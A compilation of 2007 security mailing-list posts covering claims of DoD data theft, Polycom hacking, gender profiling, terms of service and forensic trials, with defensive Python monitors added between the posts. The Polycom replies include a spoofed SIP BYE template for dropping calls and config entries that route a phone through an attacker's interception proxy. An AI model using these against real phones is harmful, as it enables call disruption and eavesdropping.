Nick FitzGerald wrote:


> _AND_ at least they noticed and moved to act against it.
>
> Every day, many hundreds of thousands of _successful_ attacks against
> corporations, small businesses and private individuals not only go
> unreported by them, but entirely undetected and largely unnoticed by
> the _attacked_.
>
> The reason for this comment?  A great many of those mocking the DHS
> over this incident are part of the group just mentioned and are too
> stupid to ever realize it...


An also *informed* number of members realize the potential of gaining
greater budgets by leaving machines vulnerable in an effort to lobby
congress for yet more pork barrel money to secure these networks
from uber hackers. So let's sift through crapaganda while it's on
the table, shall we?


/* SNIP */
“China has downloaded 10 to 20 terabytes of data from the NIPRNet
(DOD’s Non-Classified IP Router Network),” said Maj. Gen. William
Lord, director of information, services and integration in the Air
Force’s Office of Warfighting Integration and Chief Information
Officer, during the recent Air Force IT Conference in Montgomery,
Ala. (http://www.gcn.com/print/25_25/41716-1.html)
/* END SNIP */

20 Terabytes, huh. Unnoticed 20 terabytes? At that rate they would
need some massive pipes to download this all undetected. Let's
analyze the comment and the logic...

20 terabytes on an OC3 would take you 291 hours 44 minutes and 16
seconds, give or take. Gigabit Ethernet, 45 hours 30 minutes and
change... So how did they manage to achieve this marvelous feat
of magic undetected? It obviously couldn't be at high speeds,
which means they would have had to either go on undetected for
quite some time, or they embedded fiber taps INSIDE of a DoD
location (doubtable).

20 terabytes... I'll tell you what I think usually happens
with DoD and governmental sectors... Private corporations and
those in them slacking (http://cryptome.org/cg-leakage.htm).
Do I blame DoD? Absolutely. I take a different view of this
altogether under a what if I was a contractor with no one
monitoring me...

Dictating to secretary:
We need another million for these uh golf... *scratch that*
for these vertically integrated, high end clustered reverse
path packet injection token based AES FIPS standardized
firewalls. Its cutting edge technology which guarantees
and mitigates against unauthorized intrusions.

The government should undertake a *real* method to secure
their infrastructure. Have it revamped by industry experts
and implemented by those same experts. Not some deep pocket
contractors who will skim so much of the money away and into
accounts in the triple borders. (reality... like it or not)

--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
echo infiltrated.net|sed 's/^/sil@/g' 


Wise men talk because they have something to say;
fools, because they have to say something. -- Plato




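Added example (not from the original post or its author): the bandwidth argument above turned into a check a defender can run over egress flow records. It totals bytes per external destination, derives the sustained rate, and reports how long a given volume would take at that rate, so bulk egress of the kind the post says "could not go unnoticed" stands out. The link rates are nominal assumptions (the post's own figures are quoted as given) and the flow records are constructed sample data.

```python
"""Egress-volume check for the "20 TB unnoticed?" argument (added example).

Flow records (timestamp, destination, bytes) are aggregated per destination;
the sustained rate over the observed span is compared with the link capacity,
and the time needed to move a stated volume at that rate is computed.
"""
from collections import defaultdict
from dataclasses import dataclass

TERABYTE = 10**12  # decimal terabyte in bytes

# Nominal line rates in bits per second (assumed values, not the post's
# figures, which came from an unspecified calculator).
LINK_RATES_BPS = {"OC3": 155.52e6, "GigE": 1.0e9}


@dataclass(frozen=True)
class Flow:
    ts: int       # seconds since epoch
    dst: str      # external destination address
    nbytes: int   # bytes sent to dst in this flow


def transfer_seconds(volume_bytes, rate_bps):
    """Time to move volume_bytes over a link of rate_bps, in seconds."""
    return volume_bytes * 8 / rate_bps


def days_to_move(volume_bytes, rate_bps):
    """Same as transfer_seconds, expressed in days."""
    return transfer_seconds(volume_bytes, rate_bps) / 86400


def aggregate_egress(flows):
    """Per destination -> (total_bytes, span_seconds, sustained_bps)."""
    totals = defaultdict(int)
    first, last = {}, {}
    for f in flows:
        totals[f.dst] += f.nbytes
        first[f.dst] = min(first.get(f.dst, f.ts), f.ts)
        last[f.dst] = max(last.get(f.dst, f.ts), f.ts)
    out = {}
    for dst, total in totals.items():
        span = max(1, last[dst] - first[dst])   # guard against a zero span
        out[dst] = (total, span, total * 8 / span)
    return out


def flag_bulk_egress(flows, link_bps, min_bytes=5 * 10**9, fraction=0.25):
    """Destinations that received at least min_bytes at a sustained rate of
    at least fraction * link_bps.  Returns [(dst, total_bytes, sustained_bps)]
    sorted by volume, largest first."""
    hits = []
    for dst, (total, _span, bps) in aggregate_egress(flows).items():
        if total >= min_bytes and bps >= fraction * link_bps:
            hits.append((dst, total, bps))
    return sorted(hits, key=lambda h: -h[1])


# Constructed sample flows: one destination receives 11 GB in 100 s
# (a sustained 880 Mbit/s), another receives 4 MB spread over an hour.
SAMPLE_FLOWS = [
    *[Flow(1_000_000 + 10 * i, "198.51.100.7", 10**9) for i in range(11)],
    *[Flow(1_000_000 + 1200 * i, "203.0.113.5", 10**6) for i in range(4)],
]

if __name__ == "__main__":
    for name, bps in LINK_RATES_BPS.items():
        print(f"20 TB over {name}: {days_to_move(20 * TERABYTE, bps):.1f} days")
    for dst, total, bps in flag_bulk_egress(SAMPLE_FLOWS, LINK_RATES_BPS["GigE"]):
        print(f"{dst}: {total / 1e9:.1f} GB at {bps / 1e6:.0f} Mbit/s; "
              f"20 TB at this rate takes {days_to_move(20 * TERABYTE, bps):.1f} days")
```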

Re: [Full-disclosure] Polycom hacking

2007-06-26 Thread J. Oquendo

Paul Schmehl wrote:
> Is anyone aware of any work done in the field of hacking Polycom
> video-conferencing devices?  Or any known hacks for Polycom devices?



Hey Paul,

I have a modified version of Asteroid lying on one of my
servers that affected Polycoms, Snoms, Hitachi WiFi's,
and possibly a few others.

Offhand you could with high probability generate a hangup
DoS if you know enough about the network topology. E.g.:

  BYE sip:victim.phone.com SIP/2.0
  Via: SIP/2.0/TCP spoofed.pbx.server.com:5060
  Max-Forwards: 70
  From: Spoofed sip:spoofed.pbx.server.com
  To: VICTIM sip:[EMAIL PROTECTED]
  Call-ID: [EMAIL PROTECTED]
  CSeq: 1 BYE
  Content-Length: 0

You could take a look at Asteroid and target a Polycom
with it. I haven't bothered much with them. Cisco's
aren't vuln to much I've thrown at them yet.
(greetings [EMAIL PROTECTED]).

As for video (H323) check out voippong: You may be able
to intercept the audio streams out of the conference
depending on the setup. (Asterisk doesn't do H323)...
Maybe a combination of Yates, VoIPPong and others. HTH

http://www.enderunix.org/voipong/
http://www.infiltrated.net/asteroid/
http://www.voipsa.org/Resources/tools.php


--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
echo infiltrated.net|sed 's/^/sil@/g' 


Wise men talk because they have something to say;
fools, because they have to say something. -- Plato




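Added example (not from the original post or its author): a passive monitor for the spoofed BYE teardown described above, written from the defending side. It parses SIP requests, records Call-IDs seen in INVITEs, and flags a BYE that names no known dialog or arrives via a host outside the trusted proxy set. The hostnames, addresses and messages are constructed samples.

```python
"""Spoofed-BYE detection for a SIP monitor (added example).

Two signals from the post's own BYE template are checked: a Call-ID that no
observed INVITE established, and a top Via host that is not one of the
site's real SIP servers.  Either one is worth alerting on.
"""
import re

TRUSTED_PROXIES = {"pbx.example.net"}   # assumed: the site's real SIP servers


def parse_sip(raw):
    """Return (method, headers) for a SIP request; header names lower-cased.
    Parsing stops at the blank line that ends the header block."""
    lines = raw.strip().splitlines()
    method = lines[0].split(" ", 1)[0]
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, headers


def via_host(headers):
    """Host from the topmost Via header: 'SIP/2.0/TCP host:port;branch=...'.
    (IPv4 and hostnames only; bracketed IPv6 is not handled here.)"""
    m = re.match(r"SIP/2\.0/\w+\s+([^\s;:]+)", headers.get("via", ""))
    return m.group(1) if m else None


class ByeMonitor:
    def __init__(self, trusted_proxies):
        self.trusted = set(trusted_proxies)
        self.dialogs = set()     # Call-IDs established by an INVITE

    def observe(self, raw):
        """Feed one SIP request; return the list of findings for it."""
        method, h = parse_sip(raw)
        call_id = h.get("call-id")
        findings = []
        if method == "INVITE" and call_id:
            self.dialogs.add(call_id)
        elif method == "BYE":
            host = via_host(h)
            if call_id not in self.dialogs:
                findings.append(f"BYE for unknown Call-ID {call_id!r}")
            if host not in self.trusted:
                findings.append(f"BYE via untrusted host {host!r}")
            if not findings:
                self.dialogs.discard(call_id)   # legitimate teardown
        return findings


# Constructed sample traffic: an INVITE, the matching legitimate BYE, and a
# BYE that references a dialog the monitor never saw, sent via another host.
INVITE_MSG = """INVITE sip:alice@pbx.example.net SIP/2.0
Via: SIP/2.0/UDP pbx.example.net:5060;branch=z9hG4bK-inv1
From: <sip:bob@pbx.example.net>;tag=a1
To: <sip:alice@pbx.example.net>
Call-ID: call-1@pbx.example.net
CSeq: 1 INVITE
Content-Length: 0
"""

LEGIT_BYE = """BYE sip:alice@192.0.2.10 SIP/2.0
Via: SIP/2.0/UDP pbx.example.net:5060;branch=z9hG4bK-bye1
From: <sip:bob@pbx.example.net>;tag=a1
To: <sip:alice@pbx.example.net>;tag=b1
Call-ID: call-1@pbx.example.net
CSeq: 2 BYE
Content-Length: 0
"""

FORGED_BYE = """BYE sip:alice@192.0.2.10 SIP/2.0
Via: SIP/2.0/TCP 192.0.2.44:5060;branch=z9hG4bK-x
From: Spoofed <sip:pbx.example.net>
To: VICTIM <sip:alice@pbx.example.net>
Call-ID: call-9@pbx.example.net
CSeq: 1 BYE
Content-Length: 0
"""

if __name__ == "__main__":
    mon = ByeMonitor(TRUSTED_PROXIES)
    for msg in (INVITE_MSG, FORGED_BYE, LEGIT_BYE):
        for finding in mon.observe(msg):
            print("ALERT:", finding)
```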

Re: [Full-disclosure] Polycom hacking

2007-06-26 Thread J. Oquendo

Paul Schmehl wrote:


> Thanks.  I'm not that interested in DoSes, but I'm thinking that you
> could mget the entire contents, alter them to your satisfaction and
> then mput them.  Don't know how much memory these things have yet, but
> you ought to be able to iframe silent installs of malware, script the
> capture of all audio and video traffic from/to the device, etc.  Could
> be quite interesting.


On that level you could just use a MITM proxy: phone.cfg (removed html 
brackets)


xml version=1.0 encoding=UTF-8 standalone=yes
phone102
 reg
   reg.1.displayName=666
   reg.1.address=666
   reg.1.label=666
   reg.1.type=private
   reg.1.lcs=
   reg.1.thirdPartyName=
   reg.1.auth.userId=666
   reg.1.auth.password=666
   reg.1.server.1.address=original.server.ip
   reg.1.server.1.port=5060
   reg.1.server.1.transport=UDPonly
   reg.1.server.1.expires=1800
   reg.1.server.1.expires.overlap=
   reg.1.server.1.register=1
   reg.1.outboundProxy.address=man.in.the.middle.proxy
   reg.1.outboundProxy.port=5060
   reg.1.outboundProxy.transport=
   reg.1.ringType=2
   reg.1.lineKeys=
   reg.1.callsPerLineKey=

//  stripped the rest...

Where reg.1.server.1.address= points back at their PBX/H323
server. The problem with this would lie on the networking
side. Local without VLANs... Not a problem. Remotely, would
take some work but its doable. Polycoms are horrible when
it comes to doing network address translation and many set
them up in dirty DMZ's to get them to work.

Soundstations use the same XML files as the phones do. In sip.cfg:

outboundProxy voIpProt.SIP.outboundProxy.address= 
voIpProt.SIP.outboundProxy.port=5060 
voIpProt.SIP.outboundProxy.transport=DNSnaptr


Obvious entries to fill... Would work like this:

Registration and subsequent connection(s):
Soundstation -- AttackerProxy -- RealServer

With AttackerProxy looking at traffic you could recompile data,
block hosts from the conference, inject new participants, etc.


J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
echo infiltrated.net|sed 's/^/sil@/g' 


Wise men talk because they have something to say;
fools, because they have to say something. -- Plato




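Added example (not from the original post or its author): an audit of the phone.cfg / sip.cfg attributes quoted above, from the side of whoever owns the phones. Polycom provisioning files are XML; this parser accepts both real XML attributes and the bracket-stripped key=value form shown in the post, then checks every SIP server and outbound proxy against an allow-list, reports an outbound proxy that is not one of the configured servers, and flags transports not pinned to TLS. The allow-list and the example.net hostnames are assumed sample values.

```python
"""Provisioning-file audit for Polycom-style SIP attributes (added example).

The attributes checked are the ones the post shows being repointed at a
man-in-the-middle proxy: reg.N.server.M.address, reg.N.outboundProxy.address
and their .transport siblings (phone.cfg), plus voIpProt.SIP.outboundProxy.*
(sip.cfg).
"""
import re
import xml.etree.ElementTree as ET

KEY_VALUE = re.compile(r'([A-Za-z0-9_.]+)="?([^"\s]*)"?')


def parse_attributes(text):
    """Return {attribute: value} from an XML document or, when the text is
    not well-formed XML (as in the bracket-stripped post), from key=value lines."""
    try:
        root = ET.fromstring(text)
    except ET.ParseError:
        return {k: v for k, v in KEY_VALUE.findall(text)}
    attrs = {}
    for el in root.iter():
        attrs.update(el.attrib)
    return attrs


def audit_sip_config(attrs, allowed_hosts):
    """List findings: server/proxy addresses outside allowed_hosts, an outbound
    proxy that differs from every configured server, and non-TLS transports."""
    findings = []
    for key, value in sorted(attrs.items()):
        if not value:
            continue                      # unset attributes are not findings
        is_sip_host = key.endswith(".address") and (
            ".server." in key or "outboundProxy" in key)
        if is_sip_host and value not in allowed_hosts:
            findings.append(f"{key} points at unapproved host {value!r}")
        elif key.endswith(".transport") and value.upper() != "TLS":
            findings.append(f"{key} is not pinned to TLS: {value!r}")
    servers = {v for k, v in attrs.items()
               if ".server." in k and k.endswith(".address") and v}
    proxies = {v for k, v in attrs.items()
               if k.endswith("outboundProxy.address") and v}
    if servers:
        for proxy in sorted(proxies - servers):
            findings.append(
                f"outbound proxy {proxy!r} relays traffic away from the "
                f"configured servers {sorted(servers)}")
    return findings


# Constructed sample 1: the post's bracket-stripped phone.cfg fragment.
PHONE_CFG_STRIPPED = """xml version=1.0 encoding=UTF-8 standalone=yes
phone102
 reg
   reg.1.displayName=666
   reg.1.address=666
   reg.1.server.1.address=original.server.ip
   reg.1.server.1.port=5060
   reg.1.server.1.transport=UDPonly
   reg.1.outboundProxy.address=man.in.the.middle.proxy
   reg.1.outboundProxy.port=5060
   reg.1.outboundProxy.transport=
"""

# Constructed sample 2: a well-formed sip.cfg that passes the audit.
SIP_CFG_XML = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<sip><voIpProt voIpProt.SIP.outboundProxy.address="pbx.example.net"
 voIpProt.SIP.outboundProxy.port="5061"
 voIpProt.SIP.outboundProxy.transport="TLS"/></sip>
"""

ALLOWED_HOSTS = {"original.server.ip", "pbx.example.net"}   # assumed

if __name__ == "__main__":
    for name, text in (("phone.cfg", PHONE_CFG_STRIPPED), ("sip.cfg", SIP_CFG_XML)):
        for finding in audit_sip_config(parse_attributes(text), ALLOWED_HOSTS):
            print(f"{name}: {finding}")
```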

[Full-disclosure] Squashing supposed hacker profiling

2007-06-19 Thread J. Oquendo
All female authors...  Your so-called gender guessing mechanism is
flawed either way you want to cut it. You could try fuzzy math based on
theories to profile anyone on this list, but unless you have it feasible
and PROVEN without reasonable doubt, it's all a guessing game, bottom
line. Anyhow back to security, sociolinguistics is not meant for this list.


According to Dr. Krawetz's Gender Guesser... 
(http://www.hackerfactor.com/GenderGuesser.html#Analyze)

http://girlygeekdom.blogspot.com/
Genre: Informal
 Female = 104
 Male   = 602
 Difference = 498; 85.26%
 Verdict: MALE
Genre: Formal
 Female = 116
 Male   = 239
 Difference = 123; 67.32%
 Verdict: MALE

REALITY: WRONG

http://www.darkreading.com/blog.asp?blog_sectionid=342WT.svl=blogger1_5
Genre: Informal
 Female = 442
 Male   = 555
 Difference = 113; 55.66%
 Verdict: Weak MALE
Genre: Formal
 Female = 364
 Male   = 570
 Difference = 206; 61.02%
 Verdict: MALE

REALITY: WRONG

http://invisiblethings.org/papers/joanna-talk_description-CCC04.txt
Genre: Informal
 Female = 218
 Male   = 1186
 Difference = 968; 84.47%
 Verdict: MALE
Genre: Formal
 Female = 414
 Male   = 576
 Difference = 162; 58.18%
 Verdict: Weak MALE

REALITY: WRONG

http://www.techsploitation.com/2007/05/31/what-the-hell-was-i-thinking-about-green-libertarians/ 
(text by Sue Lange)

Genre: Informal
 Female = 210
 Male   = 481
 Difference = 271; 69.6%
 Verdict: MALE
Genre: Formal
 Female = 260
 Male   = 408
 Difference = 148; 61.07%
 Verdict: MALE

REALITY: WRONG

http://thelizardqueen.wordpress.com/2005/06/08/a-thoroughly-and-utterly-girly-blog-post-sorry-4/
Genre: Informal
 Female = 415
 Male   = 559
 Difference = 144; 57.39%
 Verdict: Weak MALE
Genre: Formal
 Female = 180
 Male   = 312
 Difference = 132; 63.41%
 Verdict: MALE

REALITY: WRONG


To be fair I had to go to the most feminine place I could think of, even 
then it was iffy.


http://groups.ivillage.com/motherdaughter/
Genre: Informal
 Female = 226
 Male   = 337
 Difference = 111; 59.85%
 Verdict: Weak MALE
Genre: Formal
 Female = 326
 Male   = 314
 Difference = -12; 49.06%
 Verdict: Weak FEMALE

REALITY: MAYBE THE AUTHOR HERE WAS FLAMINGLY GAY

--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
echo infiltrated.net|sed 's/^/sil@/g' 


Wise men talk because they have something to say;
fools, because they have to say something. -- Plato





Re: [Full-disclosure] Squashing supposed hacker profiling

2007-06-19 Thread J. Oquendo

Steven Adair wrote:

> Amazing, you were able to find multiple instances where a script-based
> gender guesser was wrong?  This is more profound than the initial research
> itself.  I suppose I could post a series of 10 writings where it was
> correct, but what would that prove?  Did you try reading this from the
> same page:
>
> -

Yes, I did read the page and I've also read through the obnoxious and smug
messages where this theory-based hocus pocus voodoo BS is used for so-called
hacker profiling. Quite frankly I could care less about n3td3v,
gobbles and whether or not they're one and the same. The purpose of my
message was to point out that here is the quote unquote expert Krawetz
fingering individuals based on this same concept.

While vehemently insisting his method is not flawed, I find it ironic that
he does not admit to it openly. Sure he can post it on a page, but how
about clarifying it openly. I can whip out some Chomsky documents and
offer arguments vis-a-vis, and I can surely admit publicly when I'm an
ass; I've done so plenty of times... Krawetz, you need to simmer down on
this hacker profiling. You may fool the kiddiots, but how do you know
you haven't been fooled?

--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
echo infiltrated.net|sed 's/^/sil@/g' 


Wise men talk because they have something to say;
fools, because they have to say something. -- Plato





[Full-disclosure] Shady bastards - CONFIDENTIAL (Terms of Services)

2007-06-08 Thread J. Oquendo

Larry Seltzer wrote:

>> In luxembourg for instance mails labeled as PRIVATE or CONFIDENTIAL
>> are not allowed to be viewed by the company, ALSO as email. Write it in
>> the subject line.
>
> Hey, don't read this. This isn't for you.

Too late...

This makes me wonder at times about the validity and arguments on these
signatures as well as so called Terms of Service agreements.

For anyone doing legal research, theory work, school work, I implore you
to read http://infiltrated.net/tos.html. Technically this Term of Service
may be legal... Moral? Absolutely not, but legal, I'm almost sure it can
be worded/re-worded to work. Does anyone even read their terms of service
when visiting a website or downloading software? I'm willing to say about
.0001 percent probably do. I'm willing to bet 99.% either ignore them
or skim through them. Confidentiality signatures on email? Make zero sense.
THIS MESSAGE IS CONFIDENTIAL BUT GOING TO A PUBLIC FORUM. DO NOT READ
THIS MESSAGE IF YOU CAME ACROSS THIS MESSAGE FROM A PUBLICLY LINKED SEARCH
ENGINE. CLOSE YOUR EYES AND PRETEND IT DOESN'T EXIST.

By the way, after you read the TOS, don't forget to contact me afterwards
to make payment arrangements. On a more serious note, a TOS such as this
one in my opinion, would shoot down the entire concept of the legality of
a TOS and some of the claims some TOS' make.

--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
echo infiltrated.net|sed 's/^/sil@/g' 


Wise men talk because they have something to say;
fools, because they have to say something. -- Plato





Re: [Full-disclosure] Shady bastards - CONFIDENTIAL (Terms of Services)

2007-06-08 Thread J. Oquendo
For those who didn't bother reading, technically, I can find a legal
loophole with the TOS I wrote. Some of you who visited the TOS page
ended up (based on the timing factors I see in access_log) right on my
front door. Technically, you are now bound to pay. This to me is a case
for arguing over the validity and use of broad terms and the
semi-uselessness of so-called e-contracts/e-agreements/e-signatures
and the like. I think companies love the ability to state "this mail is
confidential" knowing damn well someone will likely not think about the
extent of that statement, then turn around and twist terms for the
sake of saving face. It's a dual-edged sword, love it or hate it. As for
the previous thread and original comments regarding email... Personal
work should be left off of any network not OWNED and OPERATED by YOU the
individual. It's already established that corporate property, whether a
paper clip or email, is property of the company; there are no ifs, ands or
buts about it at present time.


In funnier matters... That's so broad it can't be considered legal... 
but usually will be (From the TOS page)



*13. LINKS*

The Service may provide, or third parties may provide, links to other 
World Wide Web sites or resources. Because Infiltrated has no control 
over such sites and resources, you acknowledge and agree that 
Infiltrated is not responsible for the availability of such external 
sites or resources, and does not endorse and is not responsible or 
liable for any Content, advertising, products or other materials on or 
available from such sites or resources. You further acknowledge and 
agree that Infiltrated shall not be responsible or liable, directly or 
indirectly, for any damage or loss caused or alleged to be caused by or 
in connection with use of or reliance on any such Content, goods or 
services available on or through any such site or resource. You also 
agree that upon visiting the Service, you will pay the Service the sum 
of $100.00 per visit regardless if you visited the Service willingly or 
unwillingly. This can, may or may not include indecent redirection to 
the Service.



How's that for obsoleting a law in one swoop. I wonder if I should call 
a lawyer and sue all the corporations who visited me this morning... I 
could use some Krispy Kremes, Starbucks, tuition at UConn, Satellite 
systems, etc.  ;)


--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
echo infiltrated.net|sed 's/^/sil@/g' 


Wise men talk because they have something to say;
fools, because they have to say something. -- Plato





Re: [Full-disclosure] Fw: [IACIS-L] Statement by Defense Expert

2007-06-07 Thread J. Oquendo

[EMAIL PROTECTED] wrote:


> So I take it that law enforcement computer examiners and prosecutors *do* have
> the years of experience in software engineering and exploit construction and
> use, to qualify them to translate a bit of data into forensic evidence of guilt?


Catch 22. This is why prosecutors often rely on expert witnesses who
even then are lacking. One of the things many omit in their methods of
thinking when it comes to perhaps going to trial is the following, and
please take it very seriously... Will the JURY understand it first and
foremost, secondly will the jury even give a rat's ass.

From experience, 1) the jury WILL NOT understand even 1/2 of the
terminology nor concepts, analogies you can throw at them. This works to
the benefit of whichever side is willing to exploit the jurors.
Overwhelm them with so much technology they'll have to believe the
accused is guilty. After all, why bring in all of these *experts* (for
the prosecution). Overwhelm them with so much technology to counter the
former experts' expertise and throw in doubt... For the defense.

On the latter... While guilty until proven innocent is the American
dream, it is seldom practiced. If so there would be no need for bail
since the defendant is after all innocent. (Bottom line holding true to
the letter of the law... Not practical, but this concept of innocent
until proven guilty is flawed). Anyhow, if one were to find themselves
on trial this is what you SHOULD expect... You will get a jury of your
so-called peers.. So let's define peer: Noun 1. peer - a person who is
of equal standing with another in a group. Your peers will never be in
equal standing from a technological perspective, period. For one, it
would take a miracle to gather a bunch of computer literate users for
jury duty. Heck, you will likely find 0; even if one appears for jury
duty, it is likely the prosecution will try to rid this person from
selection. It's not in their best interest to have someone fully
technical on trial for a few reasons. 1) The juror might associate his
experiences with the case being tried and taint an outcome based on HIS
experience, not the facts presented. Would be the main reason. It might
not be in the best interest of the defendant for the same reason.

No sir, your peer will consist of someone who's likely going to be
computer illiterate, likely twice your age, etc., they'll 1) be
frustrated they have to go through jury duty and want to get things over
with to return to normal life. 2) They'll be looking like a deer in
headlights trying to understand what the hell an expert is talking
about: "SMTP is a protocol used to deliver electronic mail. This mail
consists of binary zeros and ones which when converted formed a
corrupted gif image which caused Microsoft's Windows Small Business
Server to suffer a buffer overflow." Might sound like clockwork to
anyone here, but will sound Klingon to a juror. I could go on and on...
But one should be able to envision the possibilities of jurors being
lost and irate.

I may or may not do a write up based on my case, but that is likely
going to irritate a lot of federal agents and it will likely mean I will
end up posting my case files online which will further piss off more
federal agents and perhaps place me back to square one. Who knows, maybe
I will discuss this with an attorney beforehand. Lest I face the wrath
of again breaking into an employer while on an airplane. But hey... An
expert can always be called in on my defense on how it would have been
impossible to spoof over the Atlantic Ocean... Then again, a
counterexpert could show the possibility of me hijacking satellite after
satellite after satellite for said connection to leave a teasing message
saying... "Hi I pwnd you for shits and giggles."

--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
echo infiltrated.net|sed 's/^/sil@/g' 


Wise men talk because they have something to say;
fools, because they have to say something. -- Plato




___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] You shady bastards.

2007-06-06 Thread J. Oquendo

H D Moore wrote:

Hello,

Some friends and I were putting together a contact list for the folks 
attending the Defcon conference this year in Las Vegas. My friend sent 
out an email, with a large CC list, asking people to respond if they 
planned on attending. The email was addressed to quite a few people, with 
one of them being David Maynor. Unfortunately, his old SecureWorks 
address was used, not his current address with ErrattaSec. 

Since one of the messages sent to the group contained a URL to our phone 
numbers and names, I got paranoid and decided to determine whether 
SecureWorks was still reading email addressed to David Maynor. I sent an 
email to David's old SecureWorks address, with a subject line promising 
0-day, and a link to a non-public URL on the metasploit.com web server 
(via SSL). Twelve hours later, someone from a Comcast cable modem in 
Atlanta tried to access the link, and this someone was (confirmed) not 
David. SecureWorks is based in Atlanta. All times are CDT.


I sent the following message last night at 7:02pm.

---
From: H D Moore hdm[at]metasploit.com
To: David Maynor dmaynor[at]secureworks.com
Subject: Zero-day I promised
Date: Tue, 5 Jun 2007 19:02:11 -0500
User-Agent: KMail/1.9.3
MIME-Version: 1.0
Content-Type: text/plain;
  charset=us-ascii
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Message-Id: 200706051902.11544.hdm[at]metasploit.com
Status: RO
X-Status: RSC

https://metasploit.com/maynor.tar.gz
---

Approximately 12 hours later, the following request shows up in my Apache 
log file. It looks like someone at SecureWorks is reading email addressed 
to David and tried to access the link I sent:


71.59.27.152 - - [05/Jun/2007:19:16:42 -0500] "GET /maynor.tar.gz HTTP/1.1" 404 211 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko) Safari/419.3"


This address resolves to:
c-71-59-27-152.hsd1.ga.comcast.net

The whois information is just the standard Comcast block boilerplate.

---

Is this illegal? I could see reading email addressed to him being within 
the bounds of the law, but it seems like trying to download the 0day 
link crosses the line.


Illegal or not, this is still pretty damned shady.

Bastards.

-HD


Why would it be illegal if his former employer accessed his email using
this method. The information going to their network is considered their
property and they could do as they see fit. I could see if in your
email you included the almost always ignored disclaimer bs though:

THIS EMAIL IS INTENDED FOR THE RECIPIENT'S EYES ONLY. YOU WILL LIKELY
IGNORE THIS ANYWAY BUT USING THIS STUPIDLY CRAFTED CONFIDENTIALITY
DISCLAIMER, I WILL FILL MORE SPACE IN YOUR INBOX AND GENERATE MORE
POINTLESS BANDWIDTH USAGE ON YOUR NETWORK. IF YOU ARE NOT THE INTENDED
RECIPIENT READING THIS EMAIL AND OR ATTACHMENTS LINKS ETAL WILL RESULT
IN US PRETENDING TO HIRE A LAWYER AND DOING SOMETHING ABOUT IT.

I know how many times I've seen these listed with someone shooting
off information to mailing lists to do an oops f*** I sent that to
the wrong place... What are the options now? Sue everyone who read
it? Gash their eyes out. Normally if I were going to send out an email
that was *THAT* confidential, I personally do two things:

1) Call the person to make sure they're available to get it. If not
it's not sent until they're ready.
2) Secondly if I have to post something on my website for someone's
personal viewing, I usually do something like:

$ echo theirname|md5
6a9c1e04624bcc81a84800b8aa10a1f1

Where the checksum becomes the file and I send them the link to the
file. What are the odds of someone finding that checksum... Highly
unlikely.

--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
echo infiltrated.net|sed 's/^/sil@/g' 


Wise men talk because they have something to say;
fools, because they have to say something. -- Plato




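
The link-in-the-mailbox test HD describes above, and the per-recipient secret URL suggested in the reply, as an added example in Python (not code from either poster): it issues canary links from random tokens, flags any request for one in Apache combined-format log lines, and includes an audit check for the weaker md5(name) scheme. The host name, the log lines and the recipient name are constructed for the example.

```python
"""Canary-link monitoring (added example, not code from the thread).

HD's test works because only the addressee should ever know the URL; a
request for it in the web server log is evidence that the mailbox was read
by someone else. Two details make the result trustworthy: the path must be
unguessable (so a hit cannot be explained by scanning), and the hit is
recorded even when the file does not exist (HD's request returned 404 and
still proved the point).
"""
import hashlib
import re
import secrets
from dataclasses import dataclass
from datetime import datetime

BASE_URL = "https://canary.example.invalid"   # hypothetical host for the links

# Apache "combined" log format, the format of the request shown in the thread.
_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)


@dataclass(frozen=True)
class CanaryHit:
    recipient: str
    ip: str
    when: datetime
    status: int
    user_agent: str


class CanaryRegistry:
    """Maps each secret path to the recipient it was sent to."""

    def __init__(self):
        self._recipient_by_path = {}

    def issue(self, recipient, filename="maynor.tar.gz"):
        # 16 random bytes = 128 bits; nobody finds this path by guessing.
        token = secrets.token_urlsafe(16)
        path = f"/c/{token}/{filename}"
        self._recipient_by_path[path] = recipient
        return BASE_URL + path

    def scan(self, log_lines):
        """Return one CanaryHit per request for a registered path, any status."""
        hits = []
        for line in log_lines:
            m = _LOG_RE.match(line.strip())
            if not m:
                continue                     # not a combined-format line
            recipient = self._recipient_by_path.get(m["path"])
            if recipient is None:
                continue
            when = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
            hits.append(CanaryHit(recipient, m["ip"], when,
                                  int(m["status"]), m["ua"]))
        return hits


def is_name_derived(path, known_names):
    """Audit check for the md5(name) scheme proposed later in the thread.

    True if the last path segment equals the MD5 of a known name (with or
    without the trailing newline that `echo name | md5` adds). Such a path is
    reproducible by anyone who can guess the name, so it is a weak secret.
    """
    stem = path.rsplit("/", 1)[-1].split(".", 1)[0].lower()
    for name in known_names:
        for variant in (name, name + "\n"):
            if hashlib.md5(variant.encode()).hexdigest() == stem:
                return True
    return False


# Constructed sample: one canary for "dmaynor", then three log lines, the
# first of which fetches the canary from an unrelated address and gets a 404.
REGISTRY = CanaryRegistry()
CANARY_URL = REGISTRY.issue("dmaynor")
CANARY_PATH = CANARY_URL[len(BASE_URL):]
SAMPLE_LOG = [
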